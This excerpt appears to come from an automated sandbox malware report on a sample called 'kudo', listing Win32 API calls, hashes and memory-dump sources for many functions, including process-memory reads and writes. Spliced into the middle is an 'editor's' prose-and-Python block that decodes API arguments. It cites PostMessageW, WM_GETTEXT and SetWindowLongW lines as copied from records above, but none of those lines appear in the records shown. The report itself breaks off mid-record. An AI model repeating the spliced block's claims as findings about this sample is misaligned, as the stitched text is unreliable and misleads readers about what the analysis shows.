                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: c9e603921011496cb68437148ffaea157a5a6c263cf158c0fd9feb6499819ab1
                                                      • Instruction ID: e23e44190cb87cbd8350fd272b716da9251b648b9d1093b991ee663c30de7891
                                                      • Opcode Fuzzy Hash: c9e603921011496cb68437148ffaea157a5a6c263cf158c0fd9feb6499819ab1
                                                      • Instruction Fuzzy Hash: CE218B35A00214AFDB00EF68DC88AAABBE5FF48310F14C179E949D7362DA70EC00CB91
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0080134D
                                                      • SelectObject.GDI32(?,00000000), ref: 0080135C
                                                      • BeginPath.GDI32(?), ref: 00801373
                                                      • SelectObject.GDI32(?,00000000), ref: 0080139C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 6fa6d87119d05b5772691885158bf5a67ff449a29de55908621a6552049cd62b
                                                      • Instruction ID: ed435448e5cd4fa4c192e73fa53bcfd5a9e71dc319e4d5f14ba2091806b16a2d
                                                      • Opcode Fuzzy Hash: 6fa6d87119d05b5772691885158bf5a67ff449a29de55908621a6552049cd62b
                                                      • Instruction Fuzzy Hash: 25215930800A08EFDF119F29DC48B6A7BB8FB10761F644226F810D62F1DB74A891DF91
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00864ABA
                                                      • __beginthreadex.LIBCMT ref: 00864AD8
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00864AED
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00864B03
                                                      • CloseHandle.KERNEL32(00000000), ref: 00864B0A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                      • String ID:
                                                      • API String ID: 3824534824-0
                                                      • Opcode ID: e71b825053d185700046ad616e92195317b359dfb94caa0b713eca56bc65b52f
                                                      • Instruction ID: 96475fb852d78ba6919c082db01bd71daac94a89df80663e283a0346db916f0f
                                                      • Opcode Fuzzy Hash: e71b825053d185700046ad616e92195317b359dfb94caa0b713eca56bc65b52f
                                                      • Instruction Fuzzy Hash: E6114076908218BBCB018FACEC08E9F7FACFB45320F154269F925D32A1D674D9408BA0
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0085821E
                                                      • GetLastError.KERNEL32(?,00857CE2,?,?,?), ref: 00858228
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00857CE2,?,?,?), ref: 00858237
                                                      • RtlAllocateHeap.NTDLL(00000000,?,00857CE2), ref: 0085823E
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00858255
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 883493501-0
                                                      • Opcode ID: 6a6e40900e2d41f920321a7ebcc3206eb3d3959d9d208970fd955efbfdd42d8f
                                                      • Instruction ID: d9ebd32212d901cd73cfba85be254bb4ff48d215bfa3135c85abc4680c10e7e3
                                                      • Opcode Fuzzy Hash: 6a6e40900e2d41f920321a7ebcc3206eb3d3959d9d208970fd955efbfdd42d8f
                                                      • Instruction Fuzzy Hash: 92014675200204EFDB208FAADC88D6B7FACFF9A756F50052AF909D2220DA318C14CB60
                                                      APIs
                                                      • CLSIDFromProgID.OLE32 ref: 00857127
                                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 00857142
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857044,80070057,?,?), ref: 00857150
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00857160
                                                      • CLSIDFromString.OLE32(?,?), ref: 0085716C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: 426a562b8bbeefa3b4a5fa51bdd83c337fb4f25daf991da5a8988d73da87949d
                                                      • Instruction ID: b74576a230b12f65d6cbda314ac0e4bd79c9191ee4fffc2ed4a7023427958eff
                                                      • Opcode Fuzzy Hash: 426a562b8bbeefa3b4a5fa51bdd83c337fb4f25daf991da5a8988d73da87949d
                                                      • Instruction Fuzzy Hash: 2A018F72601619BBDB114F69EC44BAA7BADFF48792F148078FE04D2221EB31DD449BA0
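The API listings in the function records above become readable once their numeric arguments are resolved: PostMessageW with 00000201 then 00000202 separated by Sleep is WM_LBUTTONDOWN/WM_LBUTTONUP, SendMessageW with 0000000E then 0000000D followed by CharUpperBuffW and _wcsstr is WM_GETTEXTLENGTH/WM_GETTEXT, and GetWindowLongW/SetWindowLongW with 000000F0 and 000000EC are GWL_STYLE and GWL_EXSTYLE if those bytes are read as sign-extended immediates. The Python below is an added example by the editor, not part of the Joe Sandbox report or of the analysed sample: it parses lines in the report's `• Api.MODULE(args), ref: addr` format (including the "Part of subcall function" prefix), replaces well-known message IDs, GWL_* indices, SetWindowPos flags and the DACL_SECURITY_INFORMATION value with their names, and flags the two message pairs that read as a synthetic left click and a window-text read. The constant values are standard Win32 definitions; the sign-extension rule for 000000F0/000000EC and the two pattern labels are the editor's interpretation of the listing, not something the report states. The sample input is constructed from lines copied out of the records above.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Constructed input: API lines copied from the "APIs" blocks of the function records
# above, in the report's own format (bullet, Api.MODULE(args), ref: address).
SAMPLE_APIS = """\
APIs
• GetWindowRect.USER32(?,?), ref: 00858A30
• PostMessageW.USER32(?,00000201,00000001), ref: 00858ADA
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00858AE2
• PostMessageW.USER32(?,00000202,00000000), ref: 00858AF0
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0085B221
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0085B259
• _wcsstr.LIBCMT ref: 0085B289
  • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0088B1CF
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047), ref: 0088B216
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00859320
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# Standard Win32 constants (winuser.h, commctrl.h, winnt.h).
WM_NAMES = {0x000D: "WM_GETTEXT", 0x000E: "WM_GETTEXTLENGTH",
            0x0201: "WM_LBUTTONDOWN", 0x0202: "WM_LBUTTONUP",
            0x1004: "LVM_GETITEMCOUNT", 0x102C: "LVM_GETITEMSTATE"}  # LVM_FIRST = 0x1000
GWL_NAMES = {-16: "GWL_STYLE", -20: "GWL_EXSTYLE", -21: "GWL_USERDATA"}
SWP_FLAGS = [(0x01, "SWP_NOSIZE"), (0x02, "SWP_NOMOVE"), (0x04, "SWP_NOZORDER"),
             (0x08, "SWP_NOREDRAW"), (0x10, "SWP_NOACTIVATE"), (0x20, "SWP_FRAMECHANGED"),
             (0x40, "SWP_SHOWWINDOW"), (0x80, "SWP_HIDEWINDOW")]
# Editor's labels: message pairs that, seen in order through the same API, read as one action.
PATTERNS = {"synthetic left click": ("PostMessageW", 0x0201, 0x0202),
            "read window text": ("SendMessageW", 0x000E, 0x000D)}


class Call(NamedTuple):
    name: str
    module: str
    args: List[Optional[int]]  # None where the report prints '?'
    ref: int
    subcall: bool              # line carried a "Part of subcall function" prefix


def parse_api_lines(text: str) -> List[Call]:
    """Parse report API lines; headings and other non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        toks = [t.strip() for t in (m.group("args") or "").split(",") if t.strip()]
        args = [None if t == "?" else int(t, 16) for t in toks]
        calls.append(Call(m.group("name"), m.group("module"), args,
                          int(m.group("ref"), 16), m.group("sub") is not None))
    return calls


def signed_byte_immediate(v: int) -> int:
    """Assumption: imm8 operands are printed zero-extended, so GWL_STYLE (-16) shows as 000000F0."""
    return v - 0x100 if 0x80 <= v <= 0xFF else v


def decode_flags(value: int, table) -> str:
    names = [n for bit, n in table if value & bit]
    rest = value & ~sum(bit for bit, _ in table)
    return "|".join(names + ([f"0x{rest:X}"] if rest else [])) or "0"


def describe_arg(api: str, idx: int, value: Optional[int]) -> str:
    if value is None:
        return "?"
    if api in ("SendMessageW", "PostMessageW") and idx == 1:
        return WM_NAMES.get(value, f"0x{value:04X}")
    if api in ("GetWindowLongW", "SetWindowLongW") and idx == 1:
        return GWL_NAMES.get(signed_byte_immediate(value), f"0x{value:X}")
    if api == "SetWindowPos" and idx == 6:
        return decode_flags(value, SWP_FLAGS)
    if api == "GetUserObjectSecurity" and idx == 1 and value == 4:
        return "DACL_SECURITY_INFORMATION"
    return f"0x{value:X}"


def annotate(calls: List[Call]) -> List[str]:
    """One line per call with known numeric arguments replaced by constant names."""
    return [f"{c.ref:08X} {'[subcall] ' if c.subcall else ''}{c.name}("
            + ", ".join(describe_arg(c.name, i, a) for i, a in enumerate(c.args)) + ")"
            for c in calls]


def find_message_pairs(calls, api, first, second) -> List[Tuple[int, int]]:
    """(ref_first, ref_second) for each `first` message via `api` later followed by `second`."""
    pairs, pending = [], None
    for c in calls:
        if c.name != api or len(c.args) < 2:
            continue
        if c.args[1] == first:
            pending = c.ref
        elif c.args[1] == second and pending is not None:
            pairs.append((pending, c.ref))
            pending = None
    return pairs


def summarize(calls: List[Call]):
    return {label: find_message_pairs(calls, *spec) for label, spec in PATTERNS.items()}
```

Run it on the text of any "APIs" block (for example `print("\n".join(annotate(parse_api_lines(SAMPLE_APIS))))`); arguments the report prints as `?` stay as `?`, unknown values stay hexadecimal, and the `summarize` result pairs the `ref:` addresses of the WM_LBUTTONDOWN/WM_LBUTTONUP and WM_GETTEXTLENGTH/WM_GETTEXT calls so they can be looked up in the records above.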
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865260
                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0086526E
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865276
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00865280
                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008652BC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00858121
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0085812B
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0085813A
                                                      • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00858141
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00858157
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 47921759-0
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0085C1F7
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0085C20E
                                                      • MessageBeep.USER32(00000000), ref: 0085C226
                                                      • KillTimer.USER32(?,0000040A), ref: 0085C242
                                                      • EndDialog.USER32(?,00000001), ref: 0085C25C
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      APIs
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0085899D
                                                      • CloseHandle.KERNEL32(?), ref: 008589B2
                                                      • CloseHandle.KERNEL32(?), ref: 008589BA
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 008589C3
                                                      • HeapFree.KERNEL32(00000000), ref: 008589CA
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                                      • String ID:
                                                      • API String ID: 3751786701-0
                                                      APIs
                                                        • Part of subcall function 00820DB6: std::exception::exception.LIBCMT ref: 00820DEC
                                                        • Part of subcall function 00820DB6: __CxxThrowException@8.LIBCMT ref: 00820E01
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 00807A51: _memmove.LIBCMT ref: 00807AAB
                                                      • __swprintf.LIBCMT ref: 00812ECD
                                                      Strings
                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00812D66
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                      • API String ID: 1943609520-557222456
                                                      APIs
                                                        • Part of subcall function 00804750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00804743,?,?,008037AE,?), ref: 00804770
                                                      • CoInitialize.OLE32(00000000), ref: 0086B9BB
                                                      • CoCreateInstance.OLE32(00892D6C,00000000,00000001,00892BDC,?), ref: 0086B9D4
                                                      • CoUninitialize.OLE32 ref: 0086B9F1
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      Strings
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                      • String ID: .lnk
                                                      • API String ID: 2126378814-24824748
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 008250AD
                                                        • Part of subcall function 008300F0: __87except.LIBCMT ref: 0083012B
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorHandling__87except__start
                                                      • String ID: pow
                                                      • API String ID: 2905807303-2276729525
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _memset$_memmove
                                                      • String ID: ERCP
                                                      • API String ID: 2532777613-1384759551
                                                      APIs
                                                        • Part of subcall function 008614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00859296,?,?,00000034,00000800,?,00000034), ref: 008614E6
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0085983F
                                                        • Part of subcall function 00861487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008614B1
                                                        • Part of subcall function 008613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00861409
                                                        • Part of subcall function 008613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0085925A,00000034,?,?,00001004,00000000,00000000), ref: 00861419
                                                        • Part of subcall function 008613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0085925A,00000034,?,?,00001004,00000000,00000000), ref: 0086142F
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008598AC
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008598F9
                                                      Strings
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: d495c7617b25856ee7e55038171bdc543c9597c126714deed70f4e39a309e2f6
                                                      • Instruction ID: 0b6e8f1c62e4ffadd75b6ec76319b5b2bac603a5fe3da6e1fcfbefee785a8977
                                                      • Opcode Fuzzy Hash: d495c7617b25856ee7e55038171bdc543c9597c126714deed70f4e39a309e2f6
                                                      • Instruction Fuzzy Hash: 56413076A00218BFDF10DFA8CD45ADEBBB8FB05300F144199FA45B7151DA716E49CBA1
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008879DF
                                                      • GetWindowLongW.USER32 ref: 008879FC
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00887A0C
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: 9db14f8df794ff4b094c34dc85463c99cd842cdf70d5a53cc7628294b9591839
                                                      • Instruction ID: 16df269494dbf4f5c7f6bc057da27c4383780476dcd545750249eb35778d4d8c
                                                      • Opcode Fuzzy Hash: 9db14f8df794ff4b094c34dc85463c99cd842cdf70d5a53cc7628294b9591839
                                                      • Instruction Fuzzy Hash: D331DC31204606ABDB15AF38CC45BEA7BA9FB09334F204725F975E22E1D734ED919B50
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00887461
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00887475
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00887499
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: 0dea5172c6513e79bdd1c179d6e7bfc611c736619b591da2c3b4a7d57bb5a566
                                                      • Instruction ID: a10da7a6da206fb4ab365efef056fb54f32650bc3639fcfb6e9347f25e4e545a
                                                      • Opcode Fuzzy Hash: 0dea5172c6513e79bdd1c179d6e7bfc611c736619b591da2c3b4a7d57bb5a566
                                                      • Instruction Fuzzy Hash: 7B218D32500218ABDF11DEA4CC46FEA3B79FB48724F210214FE55AB191DA75E8919BA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00886D3B
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00886D4B
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00886D70
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: f871f807e46ff7d170e030b0929ea6a49a32e855e5bdf24e81157c19fd404229
                                                      • Instruction ID: 9b2dcd002ca2ae324365e9be02416b0a60ea666613fbdd4e99a51102efff0245
                                                      • Opcode Fuzzy Hash: f871f807e46ff7d170e030b0929ea6a49a32e855e5bdf24e81157c19fd404229
                                                      • Instruction Fuzzy Hash: B6219532610118BFDF119F54DC45FBB377AFF89760F118124FA459B190D671AC6187A0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00887772
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00887787
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00887794
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: e53319afd06d290922deef174ab57def5a7e90411a116e26e04e0a15c79ec5d9
                                                      • Instruction ID: b53a44c34ae5a8e0d69ea07b7b75cdfb69729c71534eae5ecb2bca305d1f3357
                                                      • Opcode Fuzzy Hash: e53319afd06d290922deef174ab57def5a7e90411a116e26e04e0a15c79ec5d9
                                                      • Instruction Fuzzy Hash: D711E772244208BAEF206F65CC05FEB7779FF89B64F114218FA41D6190D671E851CB20
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00804B45
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,00804AD0), ref: 00804B57
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                      • API String ID: 2574300362-192647395
                                                      • Opcode ID: a2dc6c3f80a40bc974b1b11382852a3ffcbd98ed865185bf325065046d9d5d93
                                                      • Instruction ID: 2617578ce70307da1f1cd7e127bf16967192bc0e383279003a3beacc531665aa
                                                      • Opcode Fuzzy Hash: a2dc6c3f80a40bc974b1b11382852a3ffcbd98ed865185bf325065046d9d5d93
                                                      • Instruction Fuzzy Hash: F7D0C274A00313CFC720AF75DC28B0272D4FF00360B1088399691D22A0D678D880C714
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00804C11
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,008C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00804C23
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-3689287502
                                                      • Opcode ID: 9d4b261724dfb38d8a7b49550487a0b85ed7730fc99f1ead0f3e88c187cbe354
                                                      • Instruction ID: 27f6362a9acf38959526e116ccdd6a52aa803903eeb3d87035944fa1c4be8033
                                                      • Opcode Fuzzy Hash: 9d4b261724dfb38d8a7b49550487a0b85ed7730fc99f1ead0f3e88c187cbe354
                                                      • Instruction Fuzzy Hash: 9BD0C270500713CFD7206F74CE0820AB6D5FF08352B008C399591C2291E6B4C880C710
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00804C44
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00804C56
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-1355242751
                                                      • Opcode ID: 964b52cd7842ac7440c1238e03860a2e8d71afae76a2de60b313027393bc052f
                                                      • Instruction ID: 97bcd6aacdd4b3ae4115fa09aafda397d66c564e2c13c99a1e5f5c8339a1877e
                                                      • Opcode Fuzzy Hash: 964b52cd7842ac7440c1238e03860a2e8d71afae76a2de60b313027393bc052f
                                                      • Instruction Fuzzy Hash: 9AD0C770600713CFE7209F35CD0820A72E4FF00361B10883EA6A2C62A1E674C8C0CB20
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00880DF5
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00880E07
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2574300362-4033151799
                                                      • Opcode ID: f5ba3b723f7ab2539c4628ff832836e43d51ff9e946435276e9f5acd89e44e07
                                                      • Instruction ID: 14b3ac5228bedcb64c3236145bbc1b5648c70d1425bb6507bde4afde15354120
                                                      • Opcode Fuzzy Hash: f5ba3b723f7ab2539c4628ff832836e43d51ff9e946435276e9f5acd89e44e07
                                                      • Instruction Fuzzy Hash: 64D0E274550722CFD761AF79C80868776E5FF04752F118C2ED696D2251E6B4D8908B50
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 008790EE
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW,?,0088F910), ref: 00879100
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                      • API String ID: 2574300362-199464113
                                                      • Opcode ID: 9e62178bf8113db74fe3e2223397d940bd3c4737a24273e58c91db6b204835c6
                                                      • Instruction ID: de0a2b79597bec526a796cfd02a94e0c93643523670d3d1372e6a83817ce5c44
